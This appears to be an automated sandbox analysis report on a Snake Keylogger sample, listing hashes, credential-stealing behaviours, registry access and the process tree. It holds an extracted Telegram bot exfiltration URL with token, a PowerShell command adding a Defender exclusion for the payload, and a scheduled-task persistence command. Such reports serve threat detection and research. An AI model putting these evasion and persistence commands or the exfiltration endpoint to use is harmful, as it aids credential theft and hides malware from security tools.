Analysis
-
max time kernel
91s -
max time network
93s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
30-09-2022 21:07
Static task
static1
Behavioral task
behavioral1
Sample
5d5f7391169c9a4d9e8d8d6d437fba5b.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
5d5f7391169c9a4d9e8d8d6d437fba5b.exe
Resource
win10v2004-20220812-en
General
-
Target
5d5f7391169c9a4d9e8d8d6d437fba5b.exe
-
Size
910KB
-
MD5
5d5f7391169c9a4d9e8d8d6d437fba5b
-
SHA1
ea834ef87b5844a50af15fc17a76af9285d6e382
-
SHA256
a63aebfac0eced90932379e91a583fcfe4012e348bb17552b030e60eeff5bb11
-
SHA512
9f4aa586e8fcb96f59354ff8bf7915852383e94e8458ed61304921d908698bb9307d6b5b43d8d11bb0af656d3abac012d5c9119dbd5de80e1629c754a355e459
-
SSDEEP
12288:fF75emvRT7QmzoRtXoXYNgPwpNjVrCP80zl+VpvUzMp8jZ63b/9MihcuHY:fZ5lvCmzo3mYNHjh+8jpaMG83bljc0Y
Malware Config
Extracted
snakekeylogger
https://api.telegram.org/bot5351092646:AAFAsmwAtpab9AZfC8LrwLb4lvENCAIBMLg/sendMessage?chat_id=1636980888
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 6 IoCs
Processes:
resource yara_rule behavioral1/memory/1604-67-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/1604-69-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/1604-70-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/1604-71-0x000000000042022E-mapping.dmp family_snakekeylogger behavioral1/memory/1604-75-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/1604-73-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
5d5f7391169c9a4d9e8d8d6d437fba5b.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 5d5f7391169c9a4d9e8d8d6d437fba5b.exe Key opened \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 5d5f7391169c9a4d9e8d8d6d437fba5b.exe Key opened \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 5d5f7391169c9a4d9e8d8d6d437fba5b.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 4 checkip.dyndns.org -
Suspicious use of SetThreadContext 1 IoCs
Processes:
5d5f7391169c9a4d9e8d8d6d437fba5b.exedescription pid process target process PID 740 set thread context of 1604 740 5d5f7391169c9a4d9e8d8d6d437fba5b.exe 5d5f7391169c9a4d9e8d8d6d437fba5b.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
Processes:
5d5f7391169c9a4d9e8d8d6d437fba5b.exe5d5f7391169c9a4d9e8d8d6d437fba5b.exepowershell.exepid process 740 5d5f7391169c9a4d9e8d8d6d437fba5b.exe 740 5d5f7391169c9a4d9e8d8d6d437fba5b.exe 740 5d5f7391169c9a4d9e8d8d6d437fba5b.exe 740 5d5f7391169c9a4d9e8d8d6d437fba5b.exe 740 5d5f7391169c9a4d9e8d8d6d437fba5b.exe 740 5d5f7391169c9a4d9e8d8d6d437fba5b.exe 740 5d5f7391169c9a4d9e8d8d6d437fba5b.exe 740 5d5f7391169c9a4d9e8d8d6d437fba5b.exe 740 5d5f7391169c9a4d9e8d8d6d437fba5b.exe 740 5d5f7391169c9a4d9e8d8d6d437fba5b.exe 740 5d5f7391169c9a4d9e8d8d6d437fba5b.exe 740 5d5f7391169c9a4d9e8d8d6d437fba5b.exe 740 5d5f7391169c9a4d9e8d8d6d437fba5b.exe 1604 5d5f7391169c9a4d9e8d8d6d437fba5b.exe 1756 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
5d5f7391169c9a4d9e8d8d6d437fba5b.exe5d5f7391169c9a4d9e8d8d6d437fba5b.exepowershell.exedescription pid process Token: SeDebugPrivilege 740 5d5f7391169c9a4d9e8d8d6d437fba5b.exe Token: SeDebugPrivilege 1604 5d5f7391169c9a4d9e8d8d6d437fba5b.exe Token: SeDebugPrivilege 1756 powershell.exe -
Suspicious use of WriteProcessMemory 17 IoCs
Processes:
5d5f7391169c9a4d9e8d8d6d437fba5b.exedescription pid process target process PID 740 wrote to memory of 1756 740 5d5f7391169c9a4d9e8d8d6d437fba5b.exe powershell.exe PID 740 wrote to memory of 1756 740 5d5f7391169c9a4d9e8d8d6d437fba5b.exe powershell.exe PID 740 wrote to memory of 1756 740 5d5f7391169c9a4d9e8d8d6d437fba5b.exe powershell.exe PID 740 wrote to memory of 1756 740 5d5f7391169c9a4d9e8d8d6d437fba5b.exe powershell.exe PID 740 wrote to memory of 1500 740 5d5f7391169c9a4d9e8d8d6d437fba5b.exe schtasks.exe PID 740 wrote to memory of 1500 740 5d5f7391169c9a4d9e8d8d6d437fba5b.exe schtasks.exe PID 740 wrote to memory of 1500 740 5d5f7391169c9a4d9e8d8d6d437fba5b.exe schtasks.exe PID 740 wrote to memory of 1500 740 5d5f7391169c9a4d9e8d8d6d437fba5b.exe schtasks.exe PID 740 wrote to memory of 1604 740 5d5f7391169c9a4d9e8d8d6d437fba5b.exe 5d5f7391169c9a4d9e8d8d6d437fba5b.exe PID 740 wrote to memory of 1604 740 5d5f7391169c9a4d9e8d8d6d437fba5b.exe 5d5f7391169c9a4d9e8d8d6d437fba5b.exe PID 740 wrote to memory of 1604 740 5d5f7391169c9a4d9e8d8d6d437fba5b.exe 5d5f7391169c9a4d9e8d8d6d437fba5b.exe PID 740 wrote to memory of 1604 740 5d5f7391169c9a4d9e8d8d6d437fba5b.exe 5d5f7391169c9a4d9e8d8d6d437fba5b.exe PID 740 wrote to memory of 1604 740 5d5f7391169c9a4d9e8d8d6d437fba5b.exe 5d5f7391169c9a4d9e8d8d6d437fba5b.exe PID 740 wrote to memory of 1604 740 5d5f7391169c9a4d9e8d8d6d437fba5b.exe 5d5f7391169c9a4d9e8d8d6d437fba5b.exe PID 740 wrote to memory of 1604 740 5d5f7391169c9a4d9e8d8d6d437fba5b.exe 5d5f7391169c9a4d9e8d8d6d437fba5b.exe PID 740 wrote to memory of 1604 740 5d5f7391169c9a4d9e8d8d6d437fba5b.exe 5d5f7391169c9a4d9e8d8d6d437fba5b.exe PID 740 wrote to memory of 1604 740 5d5f7391169c9a4d9e8d8d6d437fba5b.exe 5d5f7391169c9a4d9e8d8d6d437fba5b.exe -
outlook_office_path 1 IoCs
Processes:
5d5f7391169c9a4d9e8d8d6d437fba5b.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 5d5f7391169c9a4d9e8d8d6d437fba5b.exe -
outlook_win_path 1 IoCs
Processes:
5d5f7391169c9a4d9e8d8d6d437fba5b.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 5d5f7391169c9a4d9e8d8d6d437fba5b.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\5d5f7391169c9a4d9e8d8d6d437fba5b.exe"C:\Users\Admin\AppData\Local\Temp\5d5f7391169c9a4d9e8d8d6d437fba5b.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:740 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\IXOapxE.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1756 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IXOapxE" /XML "C:\Users\Admin\AppData\Local\Temp\tmp4931.tmp"2⤵
- Creates scheduled task(s)
PID:1500 -
C:\Users\Admin\AppData\Local\Temp\5d5f7391169c9a4d9e8d8d6d437fba5b.exe"C:\Users\Admin\AppData\Local\Temp\5d5f7391169c9a4d9e8d8d6d437fba5b.exe"2⤵
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1604
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5467abc564cd3bbb22b3e80f7a2530e17
SHA1d33017a422a003434c81909f8f79023feacbe8af
SHA25640e3253b4800861ffb1eb52ab59f18dfc340647fc20bea3177b7569c2cd1d507
SHA51288ca7893725ea5e1cd20ce740a0c463709c79a546c46f416cdd243d5c381dad6ae7e6aa48f65f23b451fce1b5d489e339fa04347e05ae0f5ec4ee54da075a530